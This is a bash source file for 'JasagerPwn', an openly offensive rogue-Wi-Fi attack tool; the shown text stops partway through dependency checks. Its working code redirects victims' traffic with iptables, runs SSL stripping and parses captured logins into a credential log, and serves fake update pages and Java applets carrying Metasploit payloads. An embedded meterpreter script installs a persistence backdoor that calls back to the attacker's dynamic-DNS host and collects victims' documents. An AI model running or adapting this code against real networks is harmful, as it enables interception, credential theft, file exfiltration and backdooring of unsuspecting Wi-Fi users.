jasagerPwn-1.1-r44
#!/bin/bash
#leg3nd's JasagerPwn Attack - v1.1 - rev44
#ATTACKS - browserPwn - Redirect LAN to Metasloits auxillary module browser autoPwn for sessions
# - FakeUpdate - Redirect LAN to fake update page with metasploit payload download.
# - Java Applet - Redirects LAN to a java applet with meterpreter payload. via SET.
# - Sniffer - Justs picks up traffic with no ARP posioning, and perfect ssl stripping
# - DeAuth - Deauths nearby clients from their APs and try to make them join yours
#
#Allows control of transparency of all attacks via built in bash menu.
# Reqires: Aircrack-ng suite (w/ airdrop-ng), Metasploit Framework, Social Engineering Toolkit, Dsniff suite
# Apache2, working ruby and python, Injection, DHCP3, SSLstrip, PHP5, Macchanger.
#
# Created for and tested with an RTL8187 monitor mode card, and a open-WRT Fon+ (Pineapple).
# For More Information refer to INSTALL_HOWTO, usage information -h / -?
#SCRIPT CONFIGURATION BELOW - ADJUST TO YOUR WIFI CONFIGURATION
IFACE="usb0" #Connection to the internet (gateway), EG wlan0,eth1,usb0,ppp0,etc
WiFiMODE="0" #Use WiFi For Internet Gateway (Will create a DeAuth Rule so you dont own yourself) EG 0,1
fonIP="192.168.10.2" #Fon router Iface IP, this is HARDCODED to 192.168.10.0 subnet.
FONIFACE="eth0" #Interface facing the Jasager router
WIFACE="wlan0" #Wireless Interface, EG wlan0,ath0,wifi0
MIFACE="mon0" #Monitor Interface for Attacks
#Macchanger, ONLY FOR ATTACK INTERFACES
macMode="set" #Mac spoofing mode - set / random (case sensitive)
fakeMac="00:e0:f7:99:e1:30" # 00:e0:f7:99:e1:30 (Cisco Systems, Inc.) lawl
ourAPmac="00:12:CF:A4:92:B1" #Pineapple MAC so we dont DeAuth Ourselves!
msfpath="/pentest/exploits/framework3" #Metasploit Location (if not BT4, use msf3 directory)
SETpath="/pentest/exploits/SET" #Social Engineering Toolkit Location
DomainName="Networking.com" #Domain name for DHCP configuration.
######################################################################################################################
#Funcion can be used to customize post-exploit meterpreter script. this steals documents and adds a backdoor.
#This slightly modified persistence script supports D-DNS tracking (like dyndns.org or no-ip)
autoMetScript="0" #Allows you to automaticlly run a meterpreter persistence script on the victim.
Pport="31337" # persistence backdoor port
PersIP="Your.dyndns.com" # Your dyndns or no-ip for backdoors
pwd=`echo $PWD`
function metScript(){
if [ -e "$SETpath/src/program_junk/multi_meter.file" ] ; then rm "$SETpath/src/program_junk/multi_meter.file" ; fi
# EDIT METERPRETER SCRIPT BELOW THIS
echo -e "persistence_dns -r $PersIP -p $Pport -i 60 -X -A
file_collector -d c:\\Users\\ -r -f *.doc|*.pdf|*.xls|*.docx| -o /tmp/files
file_collector -i /tmp/files -l $pwd/collected__$NOW
" > $SETpath/src/program_junk/multi_meter.file
}
####END SCRIPT CONFIG######
#====================================================================================================================
#####################################################################################################################
while getopts "a:p:i:w:m:s:d:h:?uU" OPTIONS; do
case ${OPTIONS} in
a ) autoMetScript=$OPTARG ;;
p ) Pport=$OPTARG ;;
d ) WiFiMODE=$OPTARG ;;
i ) IFACE=$OPTARG ;;
w ) WIFACE=$OPTARG ;;
h ) help ;;
m ) macMode=$OPTARG ;;
s ) fakeMac=$OPTARG ;;
u ) update ;;
U ) Fupdate ;;
? ) help ;;
* ) echo -e "\e[01;31m[!]\e[00m Error: Unknown Switch Option" 1>&2 ;; # Default
esac
done
#SCRIPT VARIABLES - DO NOT TOUCH - HARDCODED AND SENSITIVE
#REQUIRED CHECKS FOR FUNCTIONALITY
version="1.1"
rev="44"
Fwww="/var/www/fakeupdate"
Jwww="/var/www/javapwn"
Gwww="/var/www/google"
gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`
WIFcheck=`ifconfig | grep $WIFACE | awk '{ print $1 }'`
IFcheck=`ifconfig | grep $IFACE | awk '{ print $1 }'`
NOW=$(date +"%b-%d_%H:%m:%S")
sslport="11000"
SPWD=`echo $PWD`
javasite="1"
sniffing="0"
wasSniffing="0"
fakeupdate="0"
browserpwn="0"
javaATK="0"
z="1"
moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
ourIP=`ifconfig $FONIFACE | awk '/inet addr/ {split ($2,A,":"); print A[2]}'`
wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"`
googleRev=`wget -qO- "http://jasager-pwn.googlecode.com/svn/trunk/" | grep "
jasager-pwn - Revision" | awk -F " " '{split ($4,A,":"); print A[1]}'`
trap 'cleanup' 2 # Interrupt - "Ctrl + C"
#-----------------------------------------------------------------------
function help() { #help
echo "
(C)opyright 2011 leg3nd @ www.info-s3curity.com
Usage: bash jasagerPwn -i [interface] -m [random/set] -s [00:11:22:33:44:55]
-p [31337] -a [0/1] -w [interface]
Options:
-a [0/1] : Auto-Run Meterpreter Script, Customize in script. Current = $autoMetScript
-p [31337] : Auto-Run Scripts persistence Port. Current = $Pport
-i [interface] : Internet Gateway Interface. Current = $IFACE
-w [interface] : WiFi Card Interface. Current = $WIFACE
-d [0/1] : WiFi Gateway Mode - Adds DeAuth Rule For Yourself = $WiFiMODE
-m [random/set] : Change the Attack Interfaces MAC Address. Current = $macMode
-s [MAC] : Use this MAC Address. Requires -m. Current = $fakeMac
-u : Update script and its resources from Google Code.
-U : Update script, SET, and Metasploit.
-? / -h : Help Screen and Switches. More Information In top of script.
For Installation, setup, and more information, please reference the INSTALL file or
http://www.hak5.org/forums/index.php?showtopic=19955
"
exit 1
}
function IPTABLES(){
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --flush"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --flush"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --delete-chain"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --delete-chain"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -X"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -F"
iptables -P FORWARD ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -i $FONIFACE -o $IFACE -m state --state NEW -j ACCEPT
if [ $gatewayIP ]; then iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp --dport 53 -j DNAT --to $gatewayIP ; fi
iptables --append FORWARD --in-interface $FONIFACE -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE
#check for sslstrip
#if [ $sniffing -eq 1 ]; then
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport
#iptables --table nat --append PREROUTING --proto tcp --destination-port 80 --jump REDIRECT --to-port $sslport
#fi
ifconfig $FONIFACE $fonIP
}
function ipTableRedirect {
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --flush"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --flush"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --delete-chain"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables --table nat --delete-chain"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -X"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables" -e "iptables -F"
sleep 1
if [ $sniffing -eq "1" ] ; then
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport
#iptables --table nat --append PREROUTING --proto tcp --destination-port 80 --jump REDIRECT --to-port 80
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $TAILPID" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" &
wasSniffing=$sniffing
sniffing="0"
fi
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface $FONIFACE -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE
iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $fonIP
iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP
iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT
iptables --table nat --append PREROUTING --in-interface $FONIFACE
#redirect all traffic to us
#iptables -t nat -A PREROUTING -i $FONIFACE -j REDIRECT
ifconfig $FONIFACE $fonIP
}
#Script update via google code
function update(){
if [ ! $googleRev ]; then
echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.."
exit 1
elif [ $googleRev -lt $rev ]; then
echo -e "\e[01;31m[!]\e[00m ERROR: Your revision number is too new.."
exit 1
elif [ $googleRev -gt $rev ]; then
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..."
wget -q -N "http://jasager-pwn.googlecode.com/svn/trunk/jasagerPwn"
wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/persistence_dns.rb"
wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/deauth.sh"
#FakeUpdate
for Fitems in "favicon.ico" "index.php" "style.css" "sbd.exe" "vnchooks.dll" "wkv-x64.exe" "wkv-x86.exe" "winvnc.exe" "vnc.reg" ; do
if [ -e "./src/wwwFakeupdate/" ] ; then wget -q -N -P "./www/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwFakeupdate/$Fitems" ; fi
if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwFakeupdate/$Fitems" ; fi
done
#JavaPwn
for Jitems in "index.template" "index.template.plain" ; do
if [ -e "./src/wwwJava/" ] ; then wget -q -N -P "./src/wwwJava/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/$Jitems" ; fi
if [ -e "$Jwww/" ] ; then wget -q -N -P "$Jwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems" ; fi
done
for Jitems2 in "global.js" "index.jsp" "oo_conf_en-US.js" "oo_engine.js" "popUp.js" "print.css" "s_code_remote.js" "screen.css" ; do
if [ -e "./src/wwwJava/temp/" ] ; then wget -q -N -P "./src/wwwJava" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2" ; fi
if [ -e "$Jwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2" ; fi
done
#Google
for Gitems in "index.template" ; do
if [ -e "./src/wwwGoogle/" ] ; then wget -q -N -P "./src/wwwGoogle/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems" ; fi
if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems" ; fi
done
for Gitems2 in "favicon.ico" "gzip.html" "js1.js" ; do
if [ -e "./src/wwwGoogle/temp/" ] ; then wget -q -N -P "./wwwGoogle/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2" ; fi
if [ -e "$Gwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2" ; fi
done
elif [ $googleRev -eq $rev ]; then
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!"
fi
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!"
exit 1
}
#Full update including MSF/SET
function Fupdate(){
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating Metasploit.."
xterm -fg green -bg black -geometry 75x20+0+0 -T "JasagerPwn v$version rev$googleRev - Metaploit Update" -e "cd $msfpath && ./msfupdate"
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating SET.."
xterm -fg green -bg black -geometry 75x20-0+0 -T "JasagerPwn v$version rev$googleRev - SET Update" -e "cd $SETpath && python set-update"
if [ ! $googleRev ]; then
echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.."
exit 1
elif [ $googleRev -lt $rev ]; then
echo -e "\e[01;31m[!]\e[00m ERROR: Your revision number is too new.."
exit 1
elif [ $googleRev -gt $rev ]; then
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..."
wget -q -N "http://jasager-pwn.googlecode.com/svn/trunk/jasagerPwn"
wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/persistence_dns.rb"
wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/deauth.sh"
#FakeUpdate
for Fitems in "favicon.ico" "index.php" "style.css" "sbd.exe" "vnchooks.dll" "wkv-x64.exe" "wkv-x86.exe" "winvnc.exe" "vnc.reg" ; do
if [ -e "./src/wwwFakeupdate/" ] ; then wget -q -N -P "./www/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwFakeupdate/$Fitems" ; fi
if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwFakeupdate/$Fitems" ; fi
done
#JavaPwn
for Jitems in "index.template" "index.template.plain" ; do
if [ -e "./src/wwwJava/" ] ; then wget -q -N -P "./src/wwwJava/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/$Jitems" ; fi
if [ -e "$Jwww/" ] ; then wget -q -N -P "$Jwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems" ; fi
done
for Jitems2 in "global.js" "index.jsp" "oo_conf_en-US.js" "oo_engine.js" "popUp.js" "print.css" "s_code_remote.js" "screen.css" ; do
if [ -e "./src/wwwJava/temp/" ] ; then wget -q -N -P "./src/wwwJava" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2" ; fi
if [ -e "$Jwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2" ; fi
done
#Google
for Gitems in "index.template" ; do
if [ -e "./src/wwwGoogle/" ] ; then wget -q -N -P "./src/wwwGoogle/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems" ; fi
if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems" ; fi
done
for Gitems2 in "favicon.ico" "gzip.html" "js1.js" ; do
if [ -e "./src/wwwGoogle/temp/" ] ; then wget -q -N -P "./wwwGoogle/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2" ; fi
if [ -e "$Gwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2" ; fi
done
elif [ $googleRev -eq $rev ]; then
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!"
fi
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!"
exit 1
}
#Parse that messy SSLstrip.log
SSLparse(){
if [ -e "/$PWD/sslstrip.log" ]; then
LOGPATH="/$PWD/sslstrip.log"
DEFS="cred-collector/definitions.sslstrip"
#
NUMLINES=$(cat "$DEFS" | wc -l)
i=1
while [ $i -le $NUMLINES ]; do
VAL1=$(awk -v k=$i 'FNR == k {print $1}' "$DEFS")
VAL2=$(awk -v k=$i 'FNR == k {print $2}' "$DEFS")
VAL3=$(awk -v k=$i 'FNR == k {print $3}' "$DEFS")
VAL4=$(awk -v k=$i 'FNR == k {print $4}' "$DEFS")
GREPSTR="$(grep -a $VAL2 "$LOGPATH" | grep -a $VAL3 | grep -a $VAL4)"
if [ "$GREPSTR" ]; then
echo -n "$VAL1" "- " >> /$PWD/cred-collector/ssl-collection.log
echo "$GREPSTR" | \
sed -e 's/.*'$VAL3'=/'$VAL3'=/' -e 's/&/ /' -e 's/&.*//' >> /$PWD/cred-collector/ssl-collection.log
fi
i=$[$i+1]
done
fi
}
#function for fluid use of both SET templates
function JavaSite(){
GoogCheck=`cat $SETpath/config/set_config | grep "APACHE_DIRECTORY=/var/www/javapwn"`
#1 = google 2 = java required
if [ "$javasite" -eq "1" ] && [ "$GoogCheck" = "APACHE_DIRECTORY=/var/www/javapwn" ]; then
sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www/javapwn!APACHE_DIRECTORY=/var/www/google!' $SETpath/config/set_config > $SETpath/config/set_configJ
sleep 1
mv $SETpath/config/set_configJ $SETpath/config/set_config
elif [ "$javasite" -eq "2" ]; then
sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www/google!APACHE_DIRECTORY=/var/www/javapwn!' $SETpath/config/set_config > $SETpath/config/set_configG
sleep 1
mv $SETpath/config/set_configG $SETpath/config/set_config
fi
}
function sslstrip(){
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport
xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" &
if [ ! -e sslstrip.log ]; then touch sslstrip.log; fi
xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &
TAILPID=`echo $!`
sniffing="1"
wasSniffing=$sniffing
}
function cleanup() {
echo
echo -e "\e[01;32m[>]\e[00m Cleaning up..."
if [ $z = 1 ]; then
SSLparse && sleep 1
if test -e /tmp/dhcpd.conf; then rm /tmp/dhcpd.conf; fi
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DriftNET" -e "killall -9 driftnet" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Apache" -e "/etc/init.d/apache2 stop" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $DNSID" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Dsniff" -e "kill $dsniffID" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $TAILPID" &
#xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSL Parsing" -e "kill $parseID" &
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DHCP" -e "kill $messageID" &
xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Killing DeAuth Attacks" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID && kill $ipID && kill $dnsID2 && kill $parseID" &
#xterm -geometry 75x7+10+330 -T "[leg3nd-BrowserPwn] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing DHCP3" -e "/etc/init.d/dhcp3-server stop"
xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 urlsnarf"
xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 dsniff"
xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -F" &
xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -X" &
#Clean up our cfgs
if test -e dsniff*; then rm dsniff*; fi
if [ -e "/$PWD/dsniff.services" ]; then rm "/$PWD/dsniff.services" ; fi
if [ -e *.png ]; then rm *.png ; fi
if [ -d "$SETpath/src/html/templates/java/temp/" ]; then rm -rf $SETpath/src/html/templates/java/temp/ ; fi
if [ -d "$SETpath/src/html/templates/google/temp/" ]; then rm -rf $SETpath/src/html/templates/google/temp/ ; fi
if [ -e "$SETpath/src/html/templates/java/index.template" ] && [ -e "$SETpath/src/html/templates/java/index.template.ORIGINAL" ]; then
mv "$SETpath/src/html/templates/java/index.template.ORIGINAL" "$SETpath/src/html/templates/java/index.template"
fi
APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"`
if [ -e "$SETpath/src/html/templates/google/index.template.ORIGINAL" ] ; then mv $SETpath/src/html/templates/google/index.template.ORIGINAL $SETpath/src/html/templates/google/index.template ; fi
if [ -e "$SETpath/src/html/templates/java/index.template.ORIGINAL" ] ; then mv $SETpath/src/html/templates/java/index.template.ORIGINAL $SETpath/src/html/templates/java/index.template ; fi
if [ -e "$SETpath/config/set_config.ORIGINAL" ] ; then mv $SETpath/config/set_config.ORIGINAL $SETpath/config/set_config ; fi
if [ -e "/etc/dhcp3/dhcpd.conf" ] && [ -e "/etc/dhcp3/dhcpd.conf.ORIGINAL" ] ; then rm /etc/dhcp3/dhcpd.conf && mv /etc/dhcp3/dhcpd.conf.ORIGINAL /etc/dhcp3/dhcpd.conf ; fi
if [ -e "/etc/resolv.conf" ] && [ -e "/etc/resolv.conf.ORIGINAL" ] ; then rm /etc/resolv.conf && mv /etc/resolv.conf.ORIGINAL /etc/resolv.conf ; fi
if test -e /tmp/auto-java2; then rm /tmp/auto-java2; fi
if test -e sslstrip.log; then mv sslstrip.log /$PWD/cred-collector/$NOW-sslstrip.log; fi
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Self" -e "killall -9 jasagerPwn" &
fi
echo -e "\e[01;36m[~]\e[00m Exiting with elegance.."
exit 0
}
#xterm -geometry 75x8+100+0 -e "ifconfig $WIFACE up && sleep 2"
ifconfig $WIFACE up && sleep 1
gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`
WIFcheck=`ifconfig | grep $WIFACE | awk '{ print $1 }'`
IFcheck=`ifconfig | grep $IFACE | awk '{ print $1 }'`
ifconfig $FONIFACE $fonIP
#xterm -geometry 0x0+0+0 -e "while true ; do ifconfig $FONIFACE $fonIP && sleep 10 ; done" &
#make sure our IP doesnt get screwy from any dhcp..
while true ; do ifconfig $FONIFACE $fonIP && sleep 10 ; done &
ipID=`echo $!`
gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`
#check for required interfaces
if [ "$WIFcheck" != "$WIFACE" ]; then
echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $WIFACE..." && exit 0
fi
if [ "$IFcheck" != "$IFACE" ]; then
echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $IFACE..." && exit 0
fi
#-----------------------------------------------------------------------
clear
echo
echo
echo ' __------__'
echo ' /~ ~\'
echo ' | //^\//^\| Lets get this show on the road!!'
echo " /~~\ || o| |o|:~\ #! JasagerPwn MultiAttack v$version"
echo ' | |6 ||___|_|_||:| / By leg3nd @ info-s3curity.com'
echo " \__. / o \/ / rev$rev"
echo ' | ( O ) [!] Use At your Own Risk [!]'
echo ' /~~~~\ `\ \ /'
echo ' | |~~\ | ) ~------~`\'
echo ' / | | | / ____ /~~~)\'
echo ' (_/ | | | /. | ( |'
echo ' | | | \ / __)/ \'
echo ' \ \ \ \/ /- \ `\'
echo ' \ \|\ / | |\___|'
echo ' \ | \____/ | |'
echo ' /^~> \ _/ <'
echo ' | | \ \'
echo ' | | \ \ \'
echo ' -^-\ \ | )'
echo ' `\_______/^\______/'
echo
echo
echo -e "\e[01;32m[>]\e[00m Stopping services and programs..."
#xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'Stopping airmon-ng Interfaces'" -e "airmon-ng stop $MIFACE"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'DHCP3 Service'" -e "/etc/init.d/dhcp3-server stop"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Sniffing Apps" -e "killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DNS Spoof" -e "killall -9 dnsspoof"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "killall -9 wicd"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "/etc/init.d/wicd stop" &
sleep 1
echo -e "\e[01;32m[>]\e[00m Checking Environment..."
#test for injection - too glitchy so just got rid of it..
#injection=`aireplay-ng --test $MIFACE -i $MIFACE | sed -n -e ''3'p' | awk '{ print $2, $3, $4 }' | cut -b 1-20`
#if [ "$injection" != "Injection is working" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: $MIFACE Packet Injection Failed.. Try again, or Re-plug it in." && cleanup ; fi
#Check for root
if [ "$(id -u)" != "0" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Not Root.." && cleanup ; fi
# Check for dependencies, if not install them
#Dependencies checks
dhcp3check=`dpkg -l | grep dhcp3-server | awk '{print $2}' | head -n 1`
apache2check=`dpkg -l | grep apache2 | awk '{print $2}' | head -n 1`
apache2phpcheck=`dpkg -l | grep "libapache2-mod-php5" | awk '{print $2}' | head -n 1`
dsniffcheck=`dpkg -l | grep dsniff | awk '{print $2}' | head -n 1`
php5check=`dpkg -l | grep php5 | awk '{print $2}' | head -n 1`
macchangerCheck=`dpkg -l | grep macchanger | awk '{print $2}' | head -n 1`
aircrackCheck=`dpkg -l | grep aircrack | awk '{print $2}' | head -n 1`
sleep 1
if [ ! $dhcp3check ] || [ ! $apache2check ] || [ ! $apache2phpcheck ] || [ ! $dsniffcheck ] || [ ! $php5check ] || [ ! $macchangerCheck ] || [ ! $aircrackCheck ] || [ ! -e "/usr/bin/airdrop-ng" ] || [ ! -e $SETpath/src/payloadgen/pefile.py ]; then
echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo
elif [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then
echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo
fi
# dhcp3-server check
if [ ! $dhcp3check ]; then
echo -e "\e[01;31m[!]\e[00m No dhcp3-server was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dhcp3-server && update-rc.d -f dhcp3-server remove"
fi
# dsniff check
if [ ! $dsniffcheck ]; then
echo -e "\e[01;31m[!]\e[00m No Dsniff suite was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dsniff"
fi
# apache2 check
if [ ! $apache2check ]; then
echo -e "\e[01;31m[!]\e[00m No apache2 server was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install apache2 && update-rc.d -f apache2 remove"
elif [ ! $apache2phpcheck ]; then
echo -e "\e[01;31m[!]\e[00m No apache2 PHP5 module was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install libapache2-mod-php5"
fi
# php5 check
if [ ! $php5check ]; then
echo -e "\e[01;31m[!]\e[00m No PHP5 was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install php5 php5-curl"
fi
# macchanger check
if [ ! $macchangerCheck ]; then
echo -e "\e[01;31m[!]\e[00m No Macchanger was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install macchanger"
fi
# aircrack-ng check
if [ ! $aircrackCheck ] && [ ! -e "/usr/local/bin/aircrack-ng" ]; then
echo -e "\e[01;31m[!]\e[00m No Aircrack-ng suite was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install aircrack-ng"
fi
#sslstrip check
if [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install twisted-web linux-headers-`uname -r` build-essential gcc g++"
wget -q -P "/tmp" http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz
tar xf /tmp/sslstrip-0.8.tar.gz -C "/tmp/"
chmod +x /tmp/sslstrip-0.8/setup.py
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "python /tmp/sslstrip-0.8/setup.py install"
if [ -d "/tmp/sslstrip-0.8/" ]; then rm -rf /tmp/sslstrip-0.8/ ; fi
fi
#airdrop-ng check
if [ ! -e "/usr/bin/airdrop-ng" ]; then
if [ -e "/pentest/wireless/airdrop-ng/install.py" ]; then
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install python2.6 python2.6-dev python-psyco"
chmod +x /pentest/wireless/airdrop-ng/install.py
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "python /pentest/wireless/airdrop-ng/install.py"
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "airdrop-ng -u OUIUPDATE"
else
echo -e "\e[01;31m[!]\e[00m ERROR: Cant Find Airdrop-ng Installer.. Do it manually."
fi
fi
#metasploit check
